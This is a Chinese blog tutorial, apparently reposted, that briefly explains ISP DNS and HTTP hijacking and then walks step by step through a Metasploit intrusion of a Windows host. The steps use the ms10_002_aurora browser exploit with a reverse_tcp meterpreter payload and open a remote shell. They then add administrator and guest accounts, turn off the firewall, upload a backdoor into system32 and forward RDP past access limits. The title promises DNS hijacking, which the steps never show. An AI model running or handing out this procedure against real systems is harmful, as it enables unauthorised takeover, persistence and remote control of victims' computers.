kali之DNS劫持

本文涉及的产品
全局流量管理 GTM,标准版 1个月
公共DNS(含HTTPDNS解析),每月1000万次HTTP解析
云解析 DNS,旗舰版 1个月
简介:

DNS劫持:用户上网的DNS服务器都是运营商分配的,所以,在这个节点上,运营商可以为所欲为
例如:访问一个网站,输入域名,正常DNS服务器返回该域名的IP,而DNS劫持后,会返回一个运营商额中间服务器IP,该访问服务器会一致性的返回302,让用户浏览器跳转到预处理好的带广告的网页,在该网页中再通过iframe打开用户原来访问的地址

HTTP劫持:
在运营商的路由器节点上,设置协议检测,一旦发现是http请求,而且是html类型请求,则拦截处理。后续做法往往分为2种、1种是DNS劫持返回302让用户浏览器跳转到另外的地址,还有1种是在服务器返回的HTML数据中插入js或dom节点广告


保证网络连通性,配置网络地址

wKioL1lTbDHAQNoTAAONomhQPZA494.jpg

第一次使用msfconsole,开启内建的数据库PostgreSQL和metasplote

开启PostgreSQL:  service postgresql start
开启metasploit:  service metasploit start 

 root@kali:~ps -e|grep 5432(确保postgresql服务开启,默认占用端口是5432)

root@kali:~# msfconsole

wKiom1lTa_zwGengAAHy0wFA5dc620.jpg

查找10-002漏洞模块 search 10-002

wKiom1lTbGOjUMbrAANSYfqtYH8138.jpg

use exploit/windows/browser/ms10_002_aurora 进行漏洞攻击

set payload windows/meterpreter/reverse_tcp 定义攻击载荷 
set lhost 192.168.48.123 定义本机地址
set URIPATH / 定义url的后缀(这里我只设置了一个/)
exploit 开发

wKiom1lTbLDTHqYGAAPi-BV6hUk489.jpg

在攻击主机打开目标网站http://192.168.48.123:8080/

wKioL1lTbUjyzITDAAFdKKRfjFM974.jpg

sessions -i 1 打开连接会话

session 查看已经成功获取的会话,使用session -i 连接到指定序号的meterpreter会话已继续利用

通过shell 获取目标主机的远程命令行

通过DOS创建账号与密码

wKioL1lTpiCSq6kFAAJvTNv0odM262.jpg

Windows常用命令

wKiom1m3w46QYwW8AAHHQNERV7M910.jpg

1、net localgroup administrators    用户名 密码 /add(将用户加到管理员,使其拥有管理权限)
2、net user guest /active:yes (激活guest用户)
3、net user guest 12345 (修改guest密码为12345)
4、net user (查看账号属性)
5、net start  (查看开启了那些服务)
6、net time \\ 目标ip   (查看对方时间)
7、net view (查看局域网中开启了那些共享)
8、net share  (查看本地开启的那些共享)
9、net share C$/del        (删除c盘默认共享)
10、Copy xx.exe\\ip\admin$\System32 (将当前xx.exe复制到对方Admin$共享的System32目录内)
11、sc config tlnesvr start= auto (修改telnet服务的启动方式为自动,auto前面有一个空格)
12、net stop sharedaccess(关闭系统自带的防火墙)
13、net send IP 消息(利用messenger服务向目标IP发送消息)
14、tasklist(查看进程)
15、taskkill (结束进程)ntsd     强制结束进程
16、services.msc   进入本地计算机的服务

17、net use \\ip\ipc$ “” /user (建立空IPC链接)
18、net use \\ip\ipc$ “密码” /user:”用户名”(建立IPC非空连接,非空链接就是需要账户和密码)
19、net use \\ip\ipc$ /del   (删除ipc空连接)
20、net use z: \\127.0.0.1\c$  (映射目标主机磁盘c盘到本地磁盘z盘)

远程连接该系统

rdesktop  -u  administrator  -p  123  192.168.48.100:3389

wKiom1lTpoqz2fysAAM7hxopnrk036.jpg

getuid查看meterpreter注入到目标主机的进程所属用户
upload命令上传文件到目标主机,例如把后门程序setup.exe传到目标主机system32目录下
upload  setup.exe  C:\\windows\\system32\
portfwd 端口转发
例如目标主机上开启了3389,但是只允许特定IP访问,攻击主机无法连接,可以使用portfwd命令把目标主机的3389端口转发到其他端口打开
例如:portfwd  add -l  1122 -p 3389 -r  192.168.48.100
把目标主机192.168.48.100的3389端口转发到1122端口
这是只需要连接目标的1122端口就可以打开远程桌面了
rdesktop  -u  administrator  -p  123456  192.168.48.100:1122
sysinfo查看目标主机系统信息
ps 查看目标主机上运行的进程信息,结合migrate使用










本文转自 周小玉 51CTO博客,原文链接:http://blog.51cto.com/maguangjie/1942769,如需转载请自行联系原作者
目录
相关文章
|
6月前
|
域名解析 监控 网络协议
【域名解析DNS专栏】DNS域名劫持与防范策略:保护你的域名安全
【5月更文挑战第26天】DNS域名劫持是网络攻击手法,攻击者篡改DNS记录,将用户导向恶意网站,威胁隐私泄露、数据窃取及品牌信誉。防范策略包括使用DNSSEC加密验证响应,选择安全的DNS服务提供商,定期检查DNS记录,以及教育员工和用户识别网络威胁。通过这些措施,可以增强域名安全,抵御DNS劫持攻击。
399 0
|
SQL 域名解析 网络协议
|
缓存 网络协议 安全
Linux:设置/修改linux主机名+hosts映射+主机名解析机制分析+DNS域名劫持
Linux:设置/修改linux主机名+hosts映射+主机名解析机制分析+DNS域名劫持
753 0
Linux:设置/修改linux主机名+hosts映射+主机名解析机制分析+DNS域名劫持
|
前端开发
前端学习案例-vue2源码解析1-数据劫持
前端学习案例-vue2源码解析1-数据劫持
71 0
前端学习案例-vue2源码解析1-数据劫持
|
前端开发
前端学习案例-vue2源码解析2-数据劫持
前端学习案例-vue2源码解析2-数据劫持
66 0
|
缓存 运维 监控
面对DNS劫持,只能坐以待毙吗?
借助 ARMS-云拨测,我们可实时对网站进行监控,实现分钟级别的监控,及时发现 DNS 劫持以及页面篡改。
面对DNS劫持,只能坐以待毙吗?
|
缓存 安全 网络协议
DNS是如何被劫持的?DNS劫持会造成什么样的后果?
DNS劫持是很多站长或企业网站运维人员常遇到的网络攻击事件,网站遭到‍DNS劫持轻则影响网速,重则不能上网,而且很有可能被可能会被恶意指向各种钓鱼网站,严重影响客户个人信息账户泄密的风险。今天墨者安全就来给大家说说DNS是如何被劫持的?会造成什么样的后果?
4625 1
|
Web App开发 缓存 网络协议
ICANN敦促业界使用DNSSEC,应对DNS劫持攻击
HTTPS加密可以有效帮助服务器应对DNS欺骗、DNS劫持、ARP攻击等安全威胁。DNS是什么?DNS如何被利用?HTTPS如何防止DNS欺骗?
1678 0
|
Web App开发 网络协议 测试技术
解决电信DNS劫持
把网络连接属性(TCP/IP协议属性页)中的主要DNS和次要DNS分别改成:208.67.222.222208.67.220.220 改完DNS服务器还不行,还要清除本机上的DNS缓存,可以用命令来ipconfig /flushdns、ipconfig /displaydns来实现,或者清除浏览器的历史记录、重启电脑。
1052 0

相关产品

  • 云解析DNS
  • 推荐镜像

    更多
    下一篇
    无影云桌面